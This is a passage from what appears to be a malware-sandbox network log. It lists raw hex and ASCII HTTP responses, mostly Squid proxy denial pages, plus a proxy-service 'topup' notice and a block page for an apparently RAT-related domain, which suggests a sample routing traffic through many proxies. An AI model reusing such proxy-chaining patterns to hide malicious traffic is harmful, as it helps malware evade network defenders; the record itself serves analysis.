69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:06 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:07 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 3699X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:08 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:09 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 